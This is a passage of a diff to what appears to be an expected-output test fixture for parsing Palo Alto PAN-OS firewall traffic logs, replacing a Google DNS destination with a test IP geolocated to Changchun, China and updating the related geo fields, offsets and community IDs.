-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "184.51.253.152",
         "destination.nat.ip": "184.51.253.152",
         "destination.nat.port": 443,
@@ -117,17 +110,18 @@
         "client.nat.port": 0,
         "client.packets": 6,
         "client.port": 0,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 588,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 0,
         "destination.packets": 6,
         "destination.port": 0,
@@ -141,7 +135,7 @@
         "event.end": "2018-11-30T16:08:55.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:10 PA-220 1,2018/11/30 16:09:09,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:09,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:09,24223,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:08:55,0,any,0,32091113,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:10 PA-220 1,2018/11/30 16:09:09,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:09,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:09,24223,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:08:55,0,any,0,32091113,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:08:55.000-02:00",
         "event.timezone": "-02:00",
@@ -157,8 +151,8 @@
         "network.application": "ping",
         "network.bytes": 1176,
         "network.community_id": [
-            "1:QVXHpdoObbzEeqP6DGULYxqYgAY=",
-            "1:iNhLzwoKKarTKCq59Sts/hhZN7Q="
+            "1:FzL/FTtiSsK+G/Ipc+Dx3U6aseE=",
+            "1:P75WlJ7hfYMGDrg11tgcwQhxoAI="
         ],
         "network.direction": "outbound",
         "network.packets": 12,
@@ -175,12 +169,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 0,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24223",
-        "panw.panos.network.nat.community_id": "1:QVXHpdoObbzEeqP6DGULYxqYgAY=",
+        "panw.panos.network.nat.community_id": "1:FzL/FTtiSsK+G/Ipc+Dx3U6aseE=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091113,
         "panw.panos.source.interface": "ethernet1/2",
@@ -195,14 +189,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.224",
-            "8.8.8.8"
+            "192.168.15.224"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 588,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 0,
         "server.packets": 6,
         "server.port": 0,
@@ -228,17 +222,7 @@
         "client.packets": 6,
         "client.port": 55114,
         "destination.address": "17.253.3.202",
-        "destination.as.number": 6185,
-        "destination.as.organization.name": "Apple Inc.",
         "destination.bytes": 1035,
-        "destination.geo.city_name": "Dallas",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 32.7787,
-        "destination.geo.location.lon": -96.8217,
-        "destination.geo.region_iso_code": "US-TX",
-        "destination.geo.region_name": "Texas",
         "destination.ip": "17.253.3.202",
         "destination.nat.ip": "17.253.3.202",
         "destination.nat.port": 80,
@@ -266,7 +250,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 947,
+        "log.offset": 957,
         "network.application": "web-browsing",
         "network.bytes": 1574,
         "network.community_id": [
@@ -340,17 +324,18 @@
         "client.nat.port": 0,
         "client.packets": 6,
         "client.port": 0,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 588,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 0,
         "destination.packets": 6,
         "destination.port": 0,
@@ -364,7 +349,7 @@
         "event.end": "2018-11-30T16:09:01.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,24043,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:01,0,any,0,32091115,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:16 PA-220 1,2018/11/30 16:09:15,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:15,24043,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:01,0,any,0,32091115,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:01.000-02:00",
         "event.timezone": "-02:00",
@@ -376,12 +361,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 1441,
+        "log.offset": 1451,
         "network.application": "ping",
         "network.bytes": 1176,
         "network.community_id": [
-            "1:QVXHpdoObbzEeqP6DGULYxqYgAY=",
-            "1:iNhLzwoKKarTKCq59Sts/hhZN7Q="
+            "1:FzL/FTtiSsK+G/Ipc+Dx3U6aseE=",
+            "1:P75WlJ7hfYMGDrg11tgcwQhxoAI="
         ],
         "network.direction": "outbound",
         "network.packets": 12,
@@ -398,12 +383,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 0,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24043",
-        "panw.panos.network.nat.community_id": "1:QVXHpdoObbzEeqP6DGULYxqYgAY=",
+        "panw.panos.network.nat.community_id": "1:FzL/FTtiSsK+G/Ipc+Dx3U6aseE=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091115,
         "panw.panos.source.interface": "ethernet1/2",
@@ -418,14 +403,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.224",
-            "8.8.8.8"
+            "192.168.15.224"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 588,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 0,
         "server.packets": 6,
         "server.port": 0,
@@ -451,17 +436,7 @@
         "client.packets": 5,
         "client.port": 46774,
         "destination.address": "216.58.194.99",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
         "destination.bytes": 1613,
-        "destination.geo.city_name": "Mountain View",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.3861,
-        "destination.geo.location.lon": -122.0839,
-        "destination.geo.region_iso_code": "US-CA",
-        "destination.geo.region_name": "California",
         "destination.ip": "216.58.194.99",
         "destination.nat.ip": "216.58.194.99",
         "destination.nat.port": 443,
@@ -489,7 +464,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 1885,
+        "log.offset": 1905,
         "network.application": "quic",
         "network.bytes": 3627,
         "network.community_id": [
@@ -564,14 +539,7 @@
         "client.packets": 62,
         "client.port": 52408,
         "destination.address": "209.234.224.22",
-        "destination.as.number": 395162,
-        "destination.as.organization.name": "Markit On Demand, Inc.",
         "destination.bytes": 21111,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "209.234.224.22",
         "destination.nat.ip": "209.234.224.22",
         "destination.nat.port": 443,
@@ -599,7 +567,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 2353,
+        "log.offset": 2373,
         "network.application": "ssl",
         "network.bytes": 41753,
         "network.community_id": [
@@ -673,17 +641,18 @@
         "client.nat.port": 0,
         "client.packets": 6,
         "client.port": 0,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 588,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 0,
         "destination.packets": 6,
         "destination.port": 0,
@@ -697,7 +666,7 @@
         "event.end": "2018-11-30T16:09:07.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:22 PA-220 1,2018/11/30 16:09:21,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:21,192.168.15.224,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:21,21394,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:07,0,any,0,32091118,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:22 PA-220 1,2018/11/30 16:09:21,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:21,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:21,21394,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:07,0,any,0,32091118,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:09:07.000-02:00",
         "event.timezone": "-02:00",
@@ -709,12 +678,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 2844,
+        "log.offset": 2864,
         "network.application": "ping",
         "network.bytes": 1176,
         "network.community_id": [
-            "1:QVXHpdoObbzEeqP6DGULYxqYgAY=",
-            "1:iNhLzwoKKarTKCq59Sts/hhZN7Q="
+            "1:FzL/FTtiSsK+G/Ipc+Dx3U6aseE=",
+            "1:P75WlJ7hfYMGDrg11tgcwQhxoAI="
         ],
         "network.direction": "outbound",
         "network.packets": 12,
@@ -731,12 +700,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 0,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "21394",
-        "panw.panos.network.nat.community_id": "1:QVXHpdoObbzEeqP6DGULYxqYgAY=",
+        "panw.panos.network.nat.community_id": "1:FzL/FTtiSsK+G/Ipc+Dx3U6aseE=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091118,
         "panw.panos.source.interface": "ethernet1/2",
@@ -751,14 +720,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.224",
-            "8.8.8.8"
+            "192.168.15.224"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 588,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 0,
         "server.packets": 6,
         "server.port": 0,
@@ -784,14 +753,7 @@
         "client.packets": 7,
         "client.port": 59190,
         "destination.address": "172.217.2.238",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
         "destination.bytes": 3732,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "172.217.2.238",
         "destination.nat.ip": "172.217.2.238",
         "destination.nat.port": 443,
@@ -819,7 +781,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 3288,
+        "log.offset": 3318,
         "network.application": "quic",
         "network.bytes": 7097,
         "network.community_id": [
@@ -893,17 +855,18 @@
         "client.nat.port": 26654,
         "client.packets": 1,
         "client.port": 49728,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 221,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -917,7 +880,7 @@
         "event.end": "2018-11-30T16:08:50.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:23 PA-220 1,2018/11/30 16:09:22,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:22,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:22,24179,1,49728,53,26654,53,0x400019,udp,allow,301,80,221,2,2018/11/30 16:08:50,0,any,0,32091120,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:23 PA-220 1,2018/11/30 16:09:22,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:22,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:22,24179,1,49728,53,26654,53,0x400019,udp,allow,301,80,221,2,2018/11/30 16:08:50,0,any,0,32091120,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:08:50.000-02:00",
         "event.timezone": "-02:00",
@@ -929,12 +892,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 3758,
+        "log.offset": 3788,
         "network.application": "dns",
         "network.bytes": 301,
         "network.community_id": [
-            "1:l1lEn2QIKjwJgww02PEndRveudE=",
-            "1:viuINkmqZ3Q7wH9NHmhVu6rZuOs="
+            "1:2J7SUgG1vsxw4i37iwcSTv8Oehg=",
+            "1:T5lRauQXneZw22xJbGrCiKA4dOY="
         ],
         "network.direction": "outbound",
         "network.packets": 2,
@@ -951,12 +914,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24179",
-        "panw.panos.network.nat.community_id": "1:viuINkmqZ3Q7wH9NHmhVu6rZuOs=",
+        "panw.panos.network.nat.community_id": "1:T5lRauQXneZw22xJbGrCiKA4dOY=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091120,
         "panw.panos.source.interface": "ethernet1/2",
@@ -971,14 +934,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.207",
-            "8.8.8.8"
+            "192.168.15.207"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 221,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -1003,17 +966,18 @@
         "client.nat.port": 2486,
         "client.packets": 1,
         "client.port": 50500,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 221,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -1027,7 +991,7 @@
         "event.end": "2018-11-30T16:08:51.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:24 PA-220 1,2018/11/30 16:09:23,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:23,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:23,23933,1,50500,53,2486,53,0x400019,udp,allow,298,77,221,2,2018/11/30 16:08:51,0,any,0,32091121,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:24 PA-220 1,2018/11/30 16:09:23,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:23,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:23,23933,1,50500,53,2486,53,0x400019,udp,allow,298,77,221,2,2018/11/30 16:08:51,0,any,0,32091121,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:08:51.000-02:00",
         "event.timezone": "-02:00",
@@ -1039,12 +1003,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 4207,
+        "log.offset": 4247,
         "network.application": "dns",
         "network.bytes": 298,
         "network.community_id": [
-            "1:RK6Ut4Rb0DTrl9IRf27cop79UwI=",
-            "1:wR8JpmqlhC4f7BvxdzxRlKdkPiQ="
+            "1:SU+OmGVh/EDib8CmztQBWimJutE=",
+            "1:hL1V047KcxzlTjRlyOw0JDOTtoc="
         ],
         "network.direction": "outbound",
         "network.packets": 2,
@@ -1061,12 +1025,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "23933",
-        "panw.panos.network.nat.community_id": "1:wR8JpmqlhC4f7BvxdzxRlKdkPiQ=",
+        "panw.panos.network.nat.community_id": "1:SU+OmGVh/EDib8CmztQBWimJutE=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091121,
         "panw.panos.source.interface": "ethernet1/2",
@@ -1081,14 +1045,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.207",
-            "8.8.8.8"
+            "192.168.15.207"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 221,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -1114,14 +1078,7 @@
         "client.packets": 16,
         "client.port": 55112,
         "destination.address": "17.249.60.78",
-        "destination.as.number": 714,
-        "destination.as.organization.name": "Apple Inc.",
         "destination.bytes": 5469,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "17.249.60.78",
         "destination.nat.ip": "17.249.60.78",
         "destination.nat.port": 443,
@@ -1149,7 +1106,7 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 4655,
+        "log.offset": 4705,
         "network.application": "apple-push-notifications",
         "network.bytes": 9978,
         "network.community_id": [
@@ -1223,17 +1180,18 @@
         "client.nat.port": 24377,
         "client.packets": 1,
         "client.port": 57632,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 224,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -1247,7 +1205,7 @@
         "event.end": "2018-11-30T16:08:52.000-02:00",
         "event.kind": "event",
         "event.module": "panw",
-        "event.original": "Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,8.8.8.8,192.168.1.63,8.8.8.8,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24161,1,57632,53,24377,53,0x400019,udp,allow,297,73,224,2,2018/11/30 16:08:52,0,any,0,32091123,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
+        "event.original": "Nov 30 16:09:25 PA-220 1,2018/11/30 16:09:24,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:24,192.168.15.207,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:24,24161,1,57632,53,24377,53,0x400019,udp,allow,297,73,224,2,2018/11/30 16:08:52,0,any,0,32091123,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0",
         "event.outcome": "success",
         "event.start": "2018-11-30T16:08:52.000-02:00",
         "event.timezone": "-02:00",
@@ -1259,12 +1217,12 @@
         "fileset.name": "panos",
         "input.type": "log",
         "labels.nat_translated": true,
-        "log.offset": 5180,
+        "log.offset": 5230,
         "network.application": "dns",
         "network.bytes": 297,
         "network.community_id": [
-            "1:5lGtGtzRH+NHOqMOFVuXwxg5nCo=",
-            "1:rsDXUIQYGBC2VYTxep2/bVIc3Xs="
+            "1:MAu3UoFt7KzUWLymGuJkjMaPK9Q=",
+            "1:wSCOZL6w2h6wEM1XNXlcQojHrKI="
         ],
         "network.direction": "outbound",
         "network.packets": 2,
@@ -1281,12 +1239,12 @@
         "observer.vendor": "Palo Alto Networks",
         "panw.panos.action": "allow",
         "panw.panos.destination.interface": "ethernet1/1",
-        "panw.panos.destination.nat.ip": "8.8.8.8",
+        "panw.panos.destination.nat.ip": "175.16.199.1",
         "panw.panos.destination.nat.port": 53,
         "panw.panos.destination.zone": "untrust",
         "panw.panos.endreason": "aged-out",
         "panw.panos.flow_id": "24161",
-        "panw.panos.network.nat.community_id": "1:rsDXUIQYGBC2VYTxep2/bVIc3Xs=",
+        "panw.panos.network.nat.community_id": "1:MAu3UoFt7KzUWLymGuJkjMaPK9Q=",
         "panw.panos.ruleset": "new_outbound_from_trust",
         "panw.panos.sequence_number": 32091123,
         "panw.panos.source.interface": "ethernet1/2",
@@ -1301,14 +1259,14 @@
             "PA-220"
         ],
         "related.ip": [
+            "175.16.199.1",
             "192.168.1.63",
-            "192.168.15.207",
-            "8.8.8.8"
+            "192.168.15.207"
         ],
         "rule.name": "new_outbound_from_trust",
         "server.bytes": 224,
-        "server.ip": "8.8.8.8",
-        "server.nat.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
+        "server.nat.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -1333,17 +1291,18 @@
         "client.nat.port": 48792,
         "client.packets": 1,
         "client.port": 50271,
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
+        "destination.address": "175.16.199.1",
         "destination.bytes": 117,
